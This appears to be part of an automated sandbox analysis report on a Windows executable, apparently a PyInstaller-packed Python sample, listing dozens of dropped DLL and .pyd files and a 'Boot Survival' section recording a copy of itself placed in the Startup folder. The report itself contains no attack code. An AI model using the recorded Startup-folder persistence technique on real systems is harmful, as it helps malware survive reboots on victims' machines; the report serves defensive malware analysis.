            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\PublicKey\_x25519.pydJump to dropped file
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\Hash\_SHA512.pydJump to dropped file
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI3442\unicodedata.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto\Util\_strxor.pydJump to dropped file
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI3442\charset_normalizer\md__mypyc.cp312-win_amd64.pydJump to dropped file
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI3442\select.pydJump to dropped file
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\Math\_modexp.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto\PublicKey\_x25519.pydJump to dropped file
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\Hash\_ghash_clmul.pydJump to dropped file
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\Hash\_keccak.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto\Cipher\_raw_blowfish.pydJump to dropped file
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI3442\_queue.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto\Hash\_SHA1.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56522\_sqlite3.pydJump to dropped file
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI3442\_asyncio.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56522\libssl-3.dllJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto\Protocol\_scrypt.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56522\charset_normalizer\md__mypyc.cp312-win_amd64.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56522\select.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56522\libffi-8.dllJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto\Cipher\_raw_cast.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56522\libcrypto-3.dllJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto\PublicKey\_ec_ws.pydJump to dropped file
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\Cipher\_chacha20.pydJump to dropped file
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\Util\_strxor.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto\Cipher\_raw_cbc.pydJump to dropped file
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\Cipher\_raw_des.pydJump to dropped file
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI3442\charset_normalizer\md.cp312-win_amd64.pydJump to dropped file
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\Cipher\_raw_cast.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto\Hash\_BLAKE2b.pydJump to dropped file
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\Protocol\_scrypt.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto\Hash\_SHA384.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56522\sqlite3.dllJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56522\pywin32_system32\pywintypes312.dllJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56522\_asyncio.pydJump to dropped file
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\Hash\_MD5.pydJump to dropped file
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\Hash\_SHA224.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto\Cipher\_chacha20.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto\Hash\_ghash_clmul.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto\Hash\_poly1305.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56522\charset_normalizer\md.cp312-win_amd64.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto\Hash\_MD4.pydJump to dropped file
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto\Hash\_SHA512.pydJump to dropped file
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI3442\_multiprocessing.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto\Hash\_RIPEMD160.pydJump to dropped file
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\Hash\_SHA256.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto\Hash\_SHA224.pydJump to dropped file
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\Hash\_ghash_portable.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56522\_hashlib.pydJump to dropped file
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\Cipher\_raw_ecb.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56522\_cffi_backend.cp312-win_amd64.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56522\_overlapped.pydJump to dropped file
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI3442\_lzma.pydJump to dropped file
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\Hash\_SHA384.pydJump to dropped file
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI3442\_sqlite3.pydJump to dropped file
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI3442\_cffi_backend.cp312-win_amd64.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto\Cipher\_raw_des.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56522\_socket.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56522\VCRUNTIME140.dllJump to dropped file
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI3442\_bz2.pydJump to dropped file
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI3442\_socket.pydJump to dropped file
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\Cipher\_raw_eksblowfish.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56522\win32\win32api.pydJump to dropped file
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI3442\libcrypto-3.dllJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto\Cipher\_raw_aes.pydJump to dropped file
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\Hash\_RIPEMD160.pydJump to dropped file
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\Cipher\_raw_aesni.pydJump to dropped file
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI3442\VCRUNTIME140.dllJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56522\_uuid.pydJump to dropped file
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI3442\_uuid.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto\Cipher\_raw_ecb.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto\Hash\_MD2.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto\Hash\_SHA256.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto\Cipher\_raw_aesni.pydJump to dropped file
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\Cipher\_raw_cbc.pydJump to dropped file
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\Cipher\_raw_ctr.pydJump to dropped file
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\Cipher\_raw_arc2.pydJump to dropped file
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\Hash\_SHA1.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto\Cipher\_raw_ctr.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto\Util\_cpuid_c.pydJump to dropped file
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI3442\pyexpat.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto\Cipher\_raw_cfb.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto\Cipher\_raw_des3.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto\Hash\_ghash_portable.pydJump to dropped file
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\Hash\_poly1305.pydJump to dropped file
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\Cipher\_pkcs1_decode.pydJump to dropped file
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\PublicKey\_ed25519.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56522\_wmi.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56522\_lzma.pydJump to dropped file
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI3442\_wmi.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto\PublicKey\_ed448.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto\Cipher\_Salsa20.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto\Math\_modexp.pydJump to dropped file
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI3442\_overlapped.pydJump to dropped file
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\Util\_cpuid_c.pydJump to dropped file
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI3442\sqlite3.dllJump to dropped file
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\PublicKey\_ed448.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto\Cipher\_pkcs1_decode.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56522\unicodedata.pydJump to dropped file
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI3442\pywin32_system32\pywintypes312.dllJump to dropped file
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\Hash\_MD4.pydJump to dropped file
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\PublicKey\_ec_ws.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56522\pyexpat.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56522\_ssl.pydJump to dropped file
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\Cipher\_raw_cfb.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto\Cipher\_raw_ofb.pydJump to dropped file
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI3442\libffi-8.dllJump to dropped file
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\Hash\_BLAKE2s.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56522\python312.dllJump to dropped file
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI3442\VCRUNTIME140_1.dllJump to dropped file
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\Cipher\_raw_ofb.pydJump to dropped file
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\Cipher\_raw_blowfish.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56522\_multiprocessing.pydJump to dropped file
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI3442\win32\win32api.pydJump to dropped file
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI3442\_ssl.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto\Cipher\_ARC4.pydJump to dropped file
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI3442\_decimal.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto\Hash\_MD5.pydJump to dropped file
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI3442\libssl-3.dllJump to dropped file
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\Hash\_MD2.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto\PublicKey\_ed25519.pydJump to dropped file
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\Cipher\_raw_ocb.pydJump to dropped file
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\Cipher\_raw_aes.pydJump to dropped file

            Boot Survival

            barindex
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeJump to dropped file
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeCode function: 0_2_00007FF78F486EF0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00007FF78F486EF0
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\Hash\_BLAKE2b.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56522\_bz2.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto\Hash\_keccak.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto\Cipher\_raw_arc2.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56522\_queue.pydJump to dropped file
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\Cipher\_Salsa20.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56522\_ctypes.pydJump to dropped file
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI3442\python312.dllJump to dropped file
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI3442\_hashlib.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto\Hash\_BLAKE2s.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto\Cipher\_raw_ocb.pydJump to dropped file
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\Cipher\_raw_des3.pydJump to dropped file
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI3442\_ctypes.pydJump to dropped file
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\Cipher\_ARC4.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56522\_decimal.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56522\VCRUNTIME140_1.dllJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto\Cipher\_raw_eksblowfish.pydJump to dropped file
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\Hash\_SHA512.pydJump to dropped file
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\PublicKey\_x25519.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto\Util\_strxor.pydJump to dropped file
